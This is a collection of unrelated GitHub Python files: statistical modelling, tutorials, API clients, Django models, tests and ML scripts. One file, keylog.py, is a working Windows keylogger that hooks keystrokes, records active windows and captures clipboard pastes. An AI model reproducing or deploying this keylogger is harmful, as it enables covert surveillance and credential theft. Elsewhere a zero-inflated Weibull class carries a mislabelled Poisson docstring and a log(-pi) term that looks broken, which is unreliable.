* c)\n return ret\n\ndef alltrue_scalar(vals):\n return tt.all([tt.all(1 * val) for val in vals])\ndef bound(logp, *conditions, **kwargs):\n broadcast_conditions = kwargs.get('broadcast_conditions', True)\n\n if broadcast_conditions:\n alltrue = alltrue_elemwise\n else:\n alltrue = alltrue_scalar\n\n return tt.switch(alltrue(conditions), logp, -np.inf)\n\n\ndef draw_values(params, point=None):\n \"\"\"\n Draw (fix) parameter values. Handles a number of cases:\n\n 1) The parameter is a scalar\n 2) The parameter is an *RV\n\n a) parameter can be fixed to the value in the point\n b) parameter can be fixed by sampling from the *RV\n c) parameter can be fixed using tag.test_value (last resort)\n\n 3) The parameter is a tensor variable/constant. Can be evaluated using\n theano.function, but a variable may contain nodes which\n\n a) are named parameters in the point\n b) are *RVs with a random method\n\n \"\"\"\n # Distribution parameters may be nodes which have named node-inputs\n # specified in the point. Need to find the node-inputs to replace them.\n givens = {}\n for param in params:\n if hasattr(param, 'name'):\n named_nodes = get_named_nodes(param)\n if param.name in named_nodes:\n named_nodes.pop(param.name)\n for name, node in named_nodes.items():\n if not isinstance(node, (tt.sharedvar.SharedVariable,\n tt.TensorConstant)):\n givens[name] = (node, pm.distribution._draw_value(node, point=point))\n values = []\n for param in params:\n values.append(_draw_value(param, point=point, givens=givens.values()))\n return values\n\nclass ZeroInflatedWeibull(pm.Continuous):\n '''\n Zero-inflated Poisson log-likelihood.\n Parameters\n ----------\n psi : float\n Expected proportion of Poisson variates (0 < psi < 1)\n theta : float\n Expected number of occurrences during the given interval\n (theta >= 0).\n '''\n\n def __init__(self, pi, alpha, beta, *args, **kwargs):\n super(ZeroInflatedWeibull, self).__init__(*args, **kwargs)\n self.alpha = alpha = tt.as_tensor_variable(alpha)\n self.beta = beta = tt.as_tensor_variable(beta)\n self.pi = pi = tt.as_tensor_variable(pi)\n self.weib = pm.Weibull.dist(alpha, beta)\n# self.mode = self.weib.mode\n\n def random(self, point=None, size=None, repeat=None):\n alpha, beta, pi = draw_values([self.alpha, self.beta, self.pi],\n point=point)\n def _random(a, b, size=None):\n return b * (-np.log(np.random.uniform(size=size)))**(1 / a)\n g = generate_samples(_random, alpha, beta,\n dist_shape=self.shape,\n size=size)\n sampled = g * (np.random.random(np.squeeze(g.shape)) < pi)\n return reshape_sampled(sampled, size, self.shape)\n\n def logp(self, value):\n pi = self.pi\n alpha = self.alpha\n beta = self.beta\n\n logp_val = tt.switch(\n tt.gt(value, 0),\n tt.log(-pi) + self.weib.logp(value),\n tt.log(pi))\n\n return bound(\n logp_val,\n 0 <= value,\n 0 <= pi, pi <= 1,\n 0 < alpha,\n 0 < beta)\n\n # def _repr_latex_(self, name=None, dist=None):\n # if dist is None:\n # dist = self\n # alpha = dist.alpha\n # beta = dist.beta\n # pi = dist.pi\n # return r'${} \\sim \\text{{ZeroInflatedWeibull}}(\\mathit{{alpha}}={}, \\mathit{{beta}}={}, \\mathit{{pi}}={})$'.format(name,\n # get_variable_name(alpha),\n # get_variable_name(beta),\n # get_variable_name(pi))\n\n\n# 建模,模型\nwith pm.Model() as model_1:\n # define priors\n alpha = pm.HalfCauchy('alpha', 10, testval=.6)\n\n mu_4 = pm.Normal('mu_4', mu=0, tau=.001)\n sd_4 = pm.HalfCauchy('sd_4', 10)\n mu_3 = pm.Normal('mu_3', mu=0, tau=.001)\n sd_3 = pm.HalfCauchy('sd_3', 10)\n mu_2 = pm.Normal('mu_2', mu=0, tau=.001)\n sd_2 = pm.HalfCauchy('sd_2', 10)\n mu_1 = pm.Normal('mu_1', mu=0, tau=.001)\n sd_1 = pm.HalfCauchy('sd_1', 10)\n # mu_0 = pm.Normal('mu_0', mu=0, tau=.001)\n # sd_0 = pm.HalfCauchy('sd_0', 20)\n beta4 = pm.Normal('beta4', mu_4, sd_4, shape=companiesABC)\n beta3 = pm.Normal('beta3', mu_3, sd_3, shape=companiesABC)\n beta2 = pm.Normal('beta2', mu_2, sd_2, shape=companiesABC)\n beta1 = pm.Normal('beta1', mu_1, sd_1, shape=companiesABC)\n beta = pm.Normal('beta', 0, 100)\n u = pm.Normal('u', 0, 0.01)\n\n pi_beta = pm.Normal('pi_beta', 0, 100, shape=companiesABC)\n pi = pm.Deterministic('pi', invlogit(pi_beta[Num_shared]))\n\n theta = pm.Deterministic('theta', tt.exp(u + beta + \\\n (beta1[Num_shared] * xs_year + beta2[Num_shared] * xs_char1 + \\\n beta3[Num_shared] * xs_char2 + beta4[Num_shared] * xs_year * xs_year)))\n\n Observed = ZeroInflatedWeibull(\"Observed\", pi=pi, alpha=alpha, beta=theta, observed=ys_faults) # 观测值\n trace_1 = pm.sample(3000)\n\npm.traceplot(trace_1)\nplt.show()\n","repo_name":"Qiuchumo/QW_reliable","sub_path":"SCI/12_7ZIW.py","file_name":"12_7ZIW.py","file_ext":"py","file_size_in_byte":10395,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"24320178924","text":"#Iterative statements\n#if we want to execute a group of statements multiple times then we should go for iterative statements\n# for loop if we want to execute some action for every element in the sequence(it may be string or collection) then we should go for iterative for loop\ns=\"no one love solder untill enemy is at the border\"\ni=0\nfor x in s:\n print(\"the charcter present at\",i,\"index is:\",x)\n i=i+1\nfor t in range(10):\n print(\"surya\")\nfor x in range(11):\n print(x)\nfor x in range(21):\n if (x%2!=0):\n print(x)\nfor x in range(10,0,-1):\n if (x%2!=0):\n print(x)\n#to print sum of numbers present inside list\nd=eval(input(\"Enter numbers:\"))\nsum=0\nfor x in d:\n print(\"the sum is\",sum+x)\n sum=sum+x\n#while loop if we want to execute a group of statements iteratively untill some condition false then we should go for while loop\nx=1\nwhile x<=10:\n print(x)\n x=x+1\n\n#to display sum of first n nummbers\nn=int(input(\"Enter number:\"))\nsum=0\ni=1\nwhile i<=n:\n sum=sum+i\n i=i+1\nprint(\"sum of\",n,\"numbers is:\",sum)","repo_name":"surya-coder/vcs","sub_path":"flowcontrol.py","file_name":"flowcontrol.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42551828686","text":"import requests\n\nAPY_KEY = \"Your news API_KEY\"\nNEWS_ENDPOINT = \"https://newsapi.org/v2/everything\"\nCOMPANY_NAME = \"Tesla Inc\"\n\nnews_params = {\n \"qInTitle\": COMPANY_NAME, \n \"sortBy\": \"relevancy\",\n \"apiKey\": APY_KEY,\n}\n\nresponse = requests.get(url=NEWS_ENDPOINT, params=news_params)\nresponse.raise_for_status()\ndata = response.json()[\"articles\"]\nthree_articles = data[:3]","repo_name":"matteorascioni/python-stock-news-api-sms-alert","sub_path":"news_data.py","file_name":"news_data.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34107270398","text":"import pandas as pd\nimport numpy as np\nimport pickle\n\nfrom sklearn.linear_model import LogisticRegression\n\ndf = pd.read_csv(\"../data/creditcard.csv\")\n\n# Train test split\npos_df = df[df[\"Class\"] == 1]\nneg_df = df[df[\"Class\"] == 0]\nnp.random.seed(5)\n\npos_df[\"group\"] = np.random.randint(0,10, size=pos_df.shape[0])\nneg_df[\"group\"] = np.random.randint(0,10, size=neg_df.shape[0])\n\ntrain = pd.concat([\n neg_df[neg_df[\"group\"] < 8],\n pos_df[pos_df[\"group\"] < 8],\n]).sample(frac=1).reset_index(drop=True).drop(columns=[\"group\"])\n\ntest = pd.concat([\n neg_df[neg_df[\"group\"] >= 8],\n pos_df[pos_df[\"group\"] >= 8],\n]).sample(frac=1).reset_index(drop=True).drop(columns=[\"group\"])\n\ntrain.to_csv(\"../data/creditcard_train.csv\")\ntest.to_csv(\"../data/creditcard_test.csv\")\n\nX_train = train.drop(columns=[\"Class\"])\nX_test = test.drop(columns=[\"Class\"])\ny_train = train[\"Class\"]\ny_test = test[\"Class\"]\n\n# learning\nlr = LogisticRegression(\n random_state=0,\n penalty=\"l2\",\n C=1.0,\n solver='liblinear'\n).fit(X_train, y_train)\n\nwith open(\"../model/creditcard_fraud_detection_model.pkl\", \"wb\") as f:\n pickle.dump(lr, f)","repo_name":"marufeuille/ml_with_fc","sub_path":"model_code/make_model.py","file_name":"make_model.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71085085674","text":"#!/usr/bin/python\n# join-mapper.py\nimport sys\nimport xml.etree.ElementTree as xml\n\nPOST_TYPE_ID = 'PostTypeId'\nOWNER_USER_ID = 'OwnerUserId'\nACCEPTED_ANSWER = 'AcceptedAnswerId'\nID = 'Id'\n\nANSWER_TYPE_ID = '2'\n\nQUESTION = 'Q'\nANSWER = 'A'\n\ndef is_answer(post_type): return post_type == ANSWER_TYPE_ID\n\nfor line in sys.stdin:\n content = xml.fromstring(line.strip())\n attributes = content.attrib\n\n\n if is_answer(attributes[POST_TYPE_ID]):\n # Print the answer set\n # Outputs: A \n user_id = attributes.get(OWNER_USER_ID, None)\n answer_id = attributes.get(ID, None)\n\n # Skip results without proper attributes\n if user_id and answer_id:\n print('{0} {1} {2}'.format(answer_id, ANSWER, user_id))\n else:\n sys.stderr.write(\"Could not retrieve name and answer_id.\\n\")\n else:\n # Print the ID of the accepted answer and type\n # Outputs: Q\n accepted_answer_id = attributes.get(ACCEPTED_ANSWER, None)\n\n if accepted_answer_id:\n print('{0} {1}'.format(accepted_answer_id, QUESTION))\n\n\n\n","repo_name":"easyCZ/UoE-Projects","sub_path":"EXC/CW2/task4-3/join-mapper.py","file_name":"join-mapper.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"462706029","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom datetime import datetime\n\nimport pytest\n\nfrom travel.avia.ticket_daemon.ticket_daemon.lib.utils import fix_flight_number\nfrom travel.avia.ticket_daemon.ticket_daemon.lib.utils import parse_datetime_without_seconds\n\n\n@pytest.mark.parametrize('flight_number,expected_value', [\n ('U6 1', 'U6 1'),\n ('U6 1Д', 'U6 1'),\n ('U6 U61234Д', 'U6 1234'),\n ('F B - FB123Д', 'FB 123'),\n ('РУ 12D', 'РУ 12'),\n ('ФF 12D', 'ФФ 12'),\n ('SU 12345', 'SU 1234'),\n ('СУ 12345', 'СУ 1234'),\n ('UT 535D', 'UT 535'),\n ('ZF 3231a', 'ZF 3231'),\n ('zf 3231a', 'ZF 3231'),\n ('TRA SHcompa- -ny1 233number', None),\n ('99 123', None),\n ('1f 123', '1F 123'),\n ('1я 123', '1Я 123'),\n ('U6 0001', 'U6 1'),\n ('1f 0123', '1F 123'),\n ('1я 0123', '1Я 123'),\n ('SU 0036', 'SU 36'),\n])\ndef test_fix_flight_number(flight_number, expected_value):\n assert fix_flight_number(flight_number, is_charter=False) == expected_value\n\n\n@pytest.mark.parametrize('flight_number,expected_value', [\n ('U6 1', 'U6 1'),\n ('U6 1Д', 'U6 1'),\n ('U6 U61234Д', 'U6 1234'),\n ('F B - FB123Д', 'FB 123'),\n ('РУ 12D', 'РУ 12'),\n ('ФF 12D', 'ФФ 12'),\n ('UT 535D', 'UT 535'),\n ('ZF 3231a', 'ZF 3231'),\n ('SU 12345', 'SU 12345'),\n ('СУ 123456GR', 'СУ 123456'),\n ('YC 939401', 'YC 939401'),\n ('yc 939401', 'YC 939401'),\n ('TRA SHcompa- -ny1 233number', None),\n ('99 123', None),\n ('1f 123', '1F 123'),\n ('1я 123', '1Я 123'),\n ('U6 0001', 'U6 1'),\n ('1f 0123', '1F 123'),\n ('1я 0123', '1Я 123'),\n])\ndef test_fix_flight_number_charter(flight_number, expected_value):\n assert fix_flight_number(flight_number, is_charter=True) == expected_value\n\n\ndef test_parse_datetime_without_seconds():\n actual = parse_datetime_without_seconds('2018-01-21T13:50:59')\n expected = datetime.strptime('2018-01-21T13:50:00', '%Y-%m-%dT%H:%M:%S')\n\n assert actual == expected\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/lib/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11414895861","text":"# -*- coding: utf-8 -*-\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils.encoding import force_text\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.admin.models import LogEntry\nfrom django.contrib.auth.signals import user_logged_in\nfrom django.dispatch import receiver\nfrom django.contrib.admin.models import ADDITION, CHANGE, DELETION\nfrom django.utils import translation\n\n\nfrom app.utils import EnumChoices\nfrom ..market.models import MarketItem\n\n\nclass IncidentTracking(MarketItem):\n\n class Meta:\n proxy = True\n verbose_name = _('incident')\n verbose_name_plural = _('incident tracking')\n\n\nclass UserTracking(get_user_model()):\n \"\"\"\n Proxy model is displayed on the reporting section of admin.\n \"\"\"\n class Meta:\n proxy = True\n verbose_name = _('user tracking')\n verbose_name_plural = _('user tracking')\n\n def get_requests(self):\n return self.marketitem_set.filter(item_type='request')\n\n def get_offers(self):\n return self.marketitem_set.filter(item_type='offer')\n\n\nclass UserActivity(LogEntry):\n ACTION_CHOICES = EnumChoices(\n ADDITION=(ADDITION, _('addition')),\n CHANGE=(CHANGE, _('change')),\n DELETION=(DELETION, _('deletion')),\n LOGGED_IN=(4, _('user logged in')),\n )\n\n def get_action_flag(self):\n return dict(zip(dict(self.ACTION_CHOICES).keys(),\n dict(self.ACTION_CHOICES).values()))[self.action_flag]\n get_action_flag.short_description = _('action flag')\n get_action_flag.admin_order_field = 'action_flag'\n\n class Meta:\n proxy = True\n verbose_name = _('user activity')\n verbose_name_plural = _('user activity')\n\n\n@receiver(user_logged_in)\ndef do_stuff(sender, request, user, **kwargs):\n # set the interface language\n if hasattr(request.user, 'userprofile'):\n translation.activate(request.user.userprofile.interface_lang)\n request.LANGUAGE_CODE = translation.get_language()\n\n UserActivity.objects.log_action(\n user_id=request.user.pk,\n content_type_id=ContentType.objects.get_for_model(user).pk,\n object_id=user.pk,\n object_repr=force_text(user),\n action_flag=UserActivity.ACTION_CHOICES.LOGGED_IN\n )\n","repo_name":"ahguerilla/movements","sub_path":"app/app/reporting/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24604390790","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Site, VpnUsageStat\nfrom .forms import SiteForm\nfrom .utils import get_original_url, traffic_count\nimport requests\nfrom django.http import HttpResponse\n\nfrom django.shortcuts import get_object_or_404\n\n\n@login_required\ndef create_site(request):\n if request.method == 'POST':\n form = SiteForm(request.POST)\n if form.is_valid():\n site = form.save(commit=False)\n site.user_site = request.user\n site.save()\n return redirect('proxy:view_sites')\n else:\n form = SiteForm()\n\n return render(request, 'proxy/create_site.html', {'form': form})\n\n\n@login_required\ndef view_sites(request):\n sites = Site.objects.filter(user_site=request.user)\n return render(request, 'proxy/view_sites.html', {'sites': sites})\n\n@login_required\ndef update_site(request, site_id):\n site = get_object_or_404(Site, id=site_id, user_site=request.user)\n\n if request.method == 'POST':\n form = SiteForm(request.POST, instance=site)\n if form.is_valid():\n form.save()\n return redirect('proxy:view_sites')\n else:\n form = SiteForm(instance=site)\n\n return render(request, 'proxy/update.html', {'form': form, 'site': site})\n\n\n@login_required\ndef site_detail(request, site_id):\n site = get_object_or_404(Site, id=site_id, user_site=request.user)\n\n print(\"User:\", request.user)\n print(\"Site Name:\", site.name)\n\n vpn_usage_stat = VpnUsageStat.objects.filter(user=request.user, site_name=site.name).first()\n\n print(\"VpnUsageStat:\", vpn_usage_stat)\n\n return render(request, 'proxy/detail.html', {'site': site, 'vpn_usage_stat': vpn_usage_stat})\n\n\n\n@login_required\ndef proxy_view(request, site_name, routes_on_original_site):\n response = requests.get(routes_on_original_site)\n soup = get_original_url(response, site_name, routes_on_original_site)\n\n original_content = response.content\n modified_content = soup.prettify().encode()\n original_url = soup.prettify()\n\n traffic_count(request, site_name, len(original_content), len(modified_content))\n\n\n return HttpResponse(original_url, content_type=response.headers['content-type'])\n\n\n\ndef site_statistics(request):\n sites_with_stats = []\n\n user_sites = Site.objects.filter(user_site=request.user)\n\n for site in user_sites:\n vpn_stat = VpnUsageStat.objects.filter(user=request.user, site_name=site.name).first()\n sites_with_stats.append({\n 'site': site,\n 'stat': vpn_stat\n })\n\n return render(request, 'proxy/statistics.html', {'sites_with_stats': sites_with_stats})\n","repo_name":"VladRogozin/vpn","sub_path":"vpn/proxy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6751780856","text":"import pandas as pd\nfrom sklearn import cluster, compose, metrics, preprocessing\n\n\nclass Clustering:\n def __init__(self, target: str) -> None:\n self.target = target\n self.contrato_id = None\n self.nr_documento = None\n self.preprop_df = self.set_data()\n\n def set_data(self):\n df = pd.read_csv(\"data/to_analysis.csv\")\n\n # preprocessing\n # we need to drop columns with proportions, because\n # of those missings\n prop_columns = [column for column in df.columns if column.startswith(\"prop_\")]\n\n df.drop(prop_columns, axis=1, inplace=True)\n\n if self.target == \"dsp\":\n dspp_columns = [column for column in df.columns if \"dspp\" in column]\n df.drop(dspp_columns, axis=1, inplace=True)\n df.dropna(subset=[\"score_dsp\", \"('qtd_transacoes', 'mean')\"], inplace=True)\n elif self.target == \"dspp\":\n dsp_columns = [column for column in df.columns if \"dsp\" in column]\n df.drop(dsp_columns, axis=1, inplace=True)\n df.dropna(subset=[\"score_dspp\", \"('qtd_transacoes', 'mean')\"], inplace=True)\n\n self.contrato_id = df[\"contrato_id\"].to_list()\n self.nr_documento = df[\"nr_documento\"].to_list()\n\n df.drop([\"contrato_id\", \"nr_documento\"], axis=1, inplace=True)\n\n return df\n\n def remove_unused_categories(self) -> None:\n categorical_variables = self.preprop_df.select_dtypes(include=object).columns\n\n new_categorical_variables = [\n feature + \"_new\" for feature in categorical_variables\n ]\n df = self.preprop_df.copy()\n\n for i, feature in enumerate(categorical_variables):\n df[new_categorical_variables[i]] = df[feature].apply(\n lambda x: None if len(x.split(\",\")) > 1 else x\n )\n\n df.drop(categorical_variables, axis=1, inplace=True)\n df.dropna(subset=new_categorical_variables, inplace=True)\n\n self.preprop_df = df.copy()\n\n def frequency_encoding(self, feature: str):\n df = self.preprop_df.copy()\n\n frq_encoder = (df.groupby([feature]).size()) / len(df)\n df[feature + \"_enc\"] = df[feature].apply(lambda x: frq_encoder[x])\n\n df.drop([feature], axis=1, inplace=True)\n\n self.preprop_df = df.copy()\n\n def create_pipeline(self):\n categorical_selector = compose.make_column_selector(dtype_include=object)\n categorical_columns = categorical_selector(self.preprop_df)\n\n numerical_selector = compose.make_column_selector(dtype_exclude=object)\n numerical_columns = numerical_selector(self.preprop_df)\n\n ohe_preprocessor = preprocessing.OneHotEncoder(sparse=False)\n std_preprocessor = preprocessing.StandardScaler()\n\n preprocessor = compose.ColumnTransformer(\n [\n (\"ohe_preprocessor\", ohe_preprocessor, categorical_columns),\n (\"std_preprocessor\", std_preprocessor, numerical_columns),\n ]\n )\n\n df_transformed = preprocessor.fit_transform(self.preprop_df)\n\n clusters = [2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n score_lst = []\n for n_cluster in clusters:\n cluster_kmeans = cluster.KMeans(n_clusters=n_cluster).fit(df_transformed)\n preds = cluster_kmeans.predict(df_transformed)\n # centers = cluster_kmeans.cluster_centers_\n score = metrics.silhouette_score(df_transformed, preds, metric=\"euclidean\")\n score_lst.append(\n metrics.silhouette_score(df_transformed, preds, metric=\"euclidean\")\n )\n print(\n \"For n cluster: {}. The avg silhouette_score is {}\".format(\n n_cluster, score\n )\n )\n","repo_name":"LucianoBatista/stone-data-challenge","sub_path":"src/clustering_pipeline/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":3752,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"23494935259","text":"import uuid\nimport asyncpg\nimport secrets\nimport hashlib\n\nimport typing as t\n\nfrom quart import request\nfrom quart import jsonify\nfrom quart import Blueprint\nfrom quart import make_response\n\n\nclass TokenAuthentication():\n\n def __init__(self):\n self.valid: str = None\n\n missing = (401, 'Missing Required URL Parameter: key')\n invalid = (401, 'Invalid Request Authorization Token')\n\n\n def verify(self, key: str) -> bool:\n encrypted = hashlib.sha256(key.encode('UTF-8'))\n comparable = encrypted.hexdigest()\n\n return comparable == self.valid\n\n @classmethod\n def generate_user(cls) -> int:\n unique = uuid.uuid4()\n\n return unique.hex\n\n @classmethod\n def generate_secret(cls) -> int:\n return secrets.token_hex(12)\n\n @classmethod\n def generate_key(cls) -> t.Tuple[str, int]:\n decrypted = secrets.token_urlsafe(24)\n\n encrypted = hashlib.sha256(decrypted.encode('UTF-8'))\n storable = encrypted.hexdigest()\n\n return decrypted, storable\n\n async def fetch_key(self, user: dict) -> None:\n try:\n conn = await asyncpg.connect(\n host = '192.168.1.74',\n port = 5432,\n database = 'Authentication',\n\n user = user['client-id'],\n password = user['client-secret']\n )\n except Exception as e:\n return False\n\n query = (\n ' SELECT * FROM \"Registration\" '\n ' WHERE \"Application ID\" = $1 AND \"Status\" = $2'\n )\n\n data = await conn.fetchrow(query, user['client-id'], True)\n await conn.close()\n\n if not data:\n return False\n\n self.valid = data['Access Key']\n\n\nclass UserAuthentication():\n\n missing = (401, 'Missing Required Request Headers')\n\n invalid = (401, 'Invalid Request Authorization Credentials')\n\n @staticmethod\n def get_user(request: request) -> dict:\n try:\n user = {\n 'client-id': request.headers['client-id'],\n 'client-secret': request.headers['client-secret']\n }\n except KeyError as e:\n return False\n\n return user\n","repo_name":"Savant-Dev/SavantAPI","sub_path":"api/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14470579841","text":"first = \"Brian\"\nlast = \"Parker\"\n\n# we can do this to concat strings\nfull = first + \" \" + last\nprint(full)\n\n# this is a better way called formatted strings\n# what we have between curly braces will be replaced at run time\nfull = f\"{first} {last}\"\nprint(full)\n\n# you can put any valid espressions between {}\n\nfull = f\"{len(first)} {2 + 2}\"\nprint(full)","repo_name":"btparker70/Python-Basics","sub_path":"basics/formattedStrings.py","file_name":"formattedStrings.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6206162866","text":"from ctypes import byref, create_string_buffer, c_ulong, windll\nfrom io import StringIO\n\nimport os\nimport pythoncom\nimport pyWinhook as pyHook\nimport sys\nimport time\nimport win32clipboard\n\nTIMEOUT = 60*10\n\n# Windows only logger\n\n\nclass KeyLogger:\n def __init__(self) -> None:\n self.current_window = None\n\n def get_current_process(self):\n # get current window handle\n hwnd = windll.user32.GetForegroundWindow()\n pid = c_ulong(0)\n # get process if for current window\n windll.user32.GetWindowThreadProcessId(hwnd, byref(pid))\n process_id = f'{pid.value}'\n\n executable = create_string_buffer(512)\n h_process = windll.kernel32.OpenProcess(0x400 | 0x10, False, pid)\n\n # get executable name for process id\n windll.psapi.GetModuleBaseNameA(\n h_process, None, byref(executable), 512)\n window_title = create_string_buffer(512)\n\n # get windows title text\n windll.user32.GetWindowTextA(hwnd, byref(window_title), 512)\n\n try:\n self.current_window = window_title.value.decode()\n except UnicodeDecodeError as e:\n print(f\"{e}: window name unknown\")\n\n print(\"\\n\", process_id, executable.value.decode(), self.current_window)\n\n windll.kernel32.CloseHandle(hwnd)\n windll.kernel32.CloseHandle(h_process)\n\n # key pressing handler\n def mykeystroke(self, event):\n\n # print(f\"event.WindowName: {event.WindowName} self.current_window: {self.current_window}\")\n if event.WindowName != self.current_window:\n self.get_current_process()\n if 32 < event.Ascii < 127:\n print(chr(event.Ascii), end='')\n else:\n if event.Key == 'V':\n win32clipboard.OpenClipboard()\n value = win32clipboard.GetClipboardData()\n win32clipboard.CloseClipboard()\n print(f\"[PASTE] - {value}\")\n else:\n print(f\"{event.Key}\")\n return True\n\n# actual main methoddd\n\n\ndef run():\n save_stdout = sys.stdout\n # redirect the whole out put to memory bufferd\n # disabled for testing\n # sys.stdout = StringIO()\n\n kl = KeyLogger()\n hm = pyHook.HookManager()\n\n # set handler\n hm.KeyDown = kl.mykeystroke\n hm.HookKeyboard()\n\n while time.thread_time() < TIMEOUT:\n pythoncom.PumpWaitingMessages()\n log = sys.stdout.getvalue()\n sys.stdout = save_stdout\n return log\n\n\nif __name__ == '__main__':\n print(run())\n print(\"done.\")\n","repo_name":"vlad2010/Black_Hat_Python","sub_path":"keylog.py","file_name":"keylog.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3216744349","text":"from __future__ import absolute_import, division, unicode_literals\n\nfrom datetime import datetime, timedelta\nfrom sqlalchemy.sql import func\n\nfrom changes.api.base import APIView\nfrom changes.config import db\nfrom changes.constants import Result, Status\nfrom changes.models.build import Build\nfrom changes.models.job import Job\nfrom changes.models.jobstep import JobStep\n\n\nclass SystemStatsAPIView(APIView):\n def _get_status_counts(self, cutoff):\n excluded = [Status.finished, Status.collecting_results, Status.unknown]\n\n build_stats = dict(db.session.query(\n Build.status,\n func.count(),\n ).filter(\n Build.date_created >= cutoff,\n ~Build.status.in_(excluded),\n ).group_by(\n Build.status,\n ))\n\n job_stats = dict(db.session.query(\n Job.status,\n func.count(),\n ).filter(\n Job.date_created >= cutoff,\n ~Job.status.in_(excluded),\n ).group_by(\n Job.status,\n ))\n\n jobstep_stats = dict(db.session.query(\n JobStep.status,\n func.count(),\n ).filter(\n JobStep.date_created >= cutoff,\n ~JobStep.status.in_(excluded),\n ).group_by(\n JobStep.status,\n ))\n\n context = []\n for status in Status.__members__.values():\n if status in excluded:\n continue\n\n if status == Status.pending_allocation:\n name = 'Pending Allocation'\n else:\n name = unicode(status)\n\n context.append({\n 'name': name,\n 'numBuilds': build_stats.get(status, 0),\n 'numJobs': job_stats.get(status, 0),\n 'numJobSteps': jobstep_stats.get(status, 0),\n })\n\n return context\n\n def _get_result_counts(self, cutoff):\n build_stats = dict(db.session.query(\n Build.result,\n func.count(),\n ).filter(\n Build.date_created >= cutoff,\n Build.status == Status.finished,\n Build.result != Result.unknown,\n ).group_by(\n Build.result,\n ))\n\n job_stats = dict(db.session.query(\n Job.result,\n func.count(),\n ).filter(\n Job.date_created >= cutoff,\n Job.status == Status.finished,\n Job.result != Result.unknown,\n ).group_by(\n Job.result,\n ))\n\n jobstep_stats = dict(db.session.query(\n JobStep.result,\n func.count(),\n ).filter(\n JobStep.date_created >= cutoff,\n JobStep.status == Status.finished,\n JobStep.result != Result.unknown,\n ).group_by(\n JobStep.result,\n ))\n\n context = []\n for result in Result.__members__.values():\n if result in (Result.unknown, Result.skipped):\n continue\n\n context.append({\n 'name': unicode(result),\n 'numBuilds': build_stats.get(result, 0),\n 'numJobs': job_stats.get(result, 0),\n 'numJobSteps': jobstep_stats.get(result, 0),\n })\n\n return context\n\n def get(self):\n cutoff = datetime.utcnow() - timedelta(hours=24)\n\n context = {\n 'statusCounts': self._get_status_counts(cutoff),\n 'resultCounts': self._get_result_counts(cutoff),\n }\n\n return self.respond(context, serialize=False)\n","repo_name":"dropbox/changes","sub_path":"changes/api/system_stats.py","file_name":"system_stats.py","file_ext":"py","file_size_in_byte":3532,"program_lang":"python","lang":"en","doc_type":"code","stars":758,"dataset":"github-code","pt":"72"} +{"seq_id":"33938690783","text":"# This Python file uses the following encoding: utf-8\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\nfrom colour import Color\nimport matplotlib.colors as colors\nimport matplotlib.cm as cm\nimport matplotlib.patches as mpatches\nfrom matplotlib.figure import Figure\nfrom PySide2.QtWidgets import *\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nimport random\nimport matplotlib.path as path\n#import eBoundarySolver\nfrom pylib import eBoundarySolver\n#from PySide2.QtCore import Slots\n\n\n\nclass Electrostatics(QTabWidget):\n def __init__(self, parent=None):\n #QMainWindow.__init__(self)\n super(Electrostatics, self).__init__(parent)\n\n self.tab1 = QWidget(self)\n self.addTab(self.tab1, \"Tab 1\")\n self.figure = plt.figure(figsize=(10,5))\n self.resize(400,400)\n self.canvas = FigureCanvas(self.figure)\n self.filepath = \"\"\n\n layout = QVBoxLayout()\n layout.addWidget(self.canvas)\n self.tab1.setLayout(layout)\n\n self.inputline = QLineEdit(self)\n\n\n self.btn = QPushButton(\"Enter\")\n self.btn.clicked.connect(lambda:self.plot())\n layout.addWidget(self.btn)\n\n\n def initUI(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width,self.height)\n button = QPushButton(\"Click me\", self)\n button.setToolTip(\"Cheers\")\n button.move(100, 70)\n self.show()\n\n def plot(self):\n self.filepath = self.inputline.text()\n self.canvas.figure.clf()\n self.get_display()\n #ax = self.figure.add_subplot(111)\n #ax.plot(self.data, 'r-')\n self.create_grid()\n self.show_scalar_field()\n self.show_field_lines()\n self.show_equipotential()\n self.canvas.draw()\n\n # Reads from a specified csv file to a matrix\n def get_display(self):\n filename = self.filepath\n #filename = \"../Q2_SOR.csv\"\n #filename 